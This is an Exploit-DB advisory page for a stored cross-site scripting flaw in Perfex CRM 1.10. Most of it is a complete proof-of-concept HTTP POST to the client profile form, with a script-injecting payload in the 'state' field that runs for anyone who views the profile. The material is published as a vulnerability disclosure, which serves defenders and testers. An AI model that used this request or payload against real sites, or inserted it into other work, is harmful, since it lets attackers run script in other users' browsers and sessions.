perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)

EDB-ID:

50097

CVE:

N/A

EDB Verified:

Author:

Alhasan Abbas

Type:

webapps

Exploit:   /  

Platform:

Multiple

Date:

2021-07-06

Vulnerable App: 
# Exploit Title: perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)
# Date: 05/07/2021
# Exploit Author: Alhasan Abbas (exploit.msf)
# Vendor Homepage: https://www.perfexcrm.com/
# Version: 1.10
# Tested on: windows 10

Vunlerable page: /clients/profile

POC:
----
POST /clients/profile HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058

Content-Length: 1548

Origin: http://localhost

Connection: close

Referer: http://localhost/clients/profile

Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038

Upgrade-Insecure-Requests: 1



-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="profile"



1

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="profile_image"; filename=""

Content-Type: application/octet-stream





-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="firstname"



adfgsg

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="lastname"



fsdgfdg

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="company"



test

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="vat"



1

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="phonenumber"





-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="country"



105

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="city"



asdf

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="address"



asdf

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="zip"



313

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="state"



""><body onload=alert("XSS")>">

-----------------------------325278703021926100783634528058--

then any one open profile page in user the xss its executed
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services